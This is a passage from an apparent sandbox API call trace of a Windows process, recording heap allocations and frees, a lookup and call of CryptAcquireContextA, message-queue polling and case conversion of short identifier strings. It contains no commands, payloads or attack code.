0x34aa5e0 [0257.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0257.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0257.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0257.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0257.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0257.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0257.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0257.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0257.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0257.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0257.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0257.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0257.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0257.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0257.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0257.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0257.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0257.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0257.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0257.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0257.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0257.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0257.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0257.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0257.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0257.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0257.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0257.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0257.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0257.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0257.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0257.724] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0257.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0257.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0257.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0257.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0257.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0257.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0257.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0257.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0257.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0257.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0257.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0257.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0257.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0257.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0257.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0257.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0257.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0257.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0257.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0257.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0257.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0257.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0257.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0257.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0257.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0257.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0257.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0257.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0257.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0257.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0257.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0257.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0257.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0257.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0257.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0257.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0257.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0257.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0257.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0257.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0257.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0257.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0257.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0257.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0257.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0257.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0257.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0257.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0257.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0257.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0257.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466db0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0257.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0257.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0257.728] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0257.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0257.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0257.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0257.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466db0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0257.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0257.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0257.730] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0257.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0257.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0257.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b39d0 | out: hHeap=0x25c0000) returned 1 [0257.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0257.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0257.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0257.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0257.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0257.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0257.731] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2940) returned 1 [0257.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0257.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0257.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0257.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0257.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0257.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0257.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0257.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0257.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0257.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0257.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0257.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0257.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0257.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0257.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0257.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0257.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0257.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0257.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0257.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0257.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0257.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0257.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0257.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0257.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0257.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0257.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0257.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0257.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0257.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0257.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0257.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0257.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0257.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0257.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0257.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0257.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0257.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0257.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0257.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0257.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0257.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0257.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0257.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0257.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0257.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0257.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0257.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0257.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0257.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0257.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0257.735] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0257.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0257.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0257.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0257.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0257.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0257.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0257.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0257.735] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0257.735] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0257.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0257.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0257.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0257.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2d28 [0257.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0257.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0257.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0257.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0257.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0257.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0257.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0257.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0257.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0257.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0257.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0257.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0257.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0257.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa9b8 [0257.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0257.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0257.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0257.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0257.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0257.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0257.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0257.737] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0257.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0257.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0257.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0257.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0257.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0257.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0257.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0257.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0257.737] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0257.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0257.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0257.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0257.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0257.738] 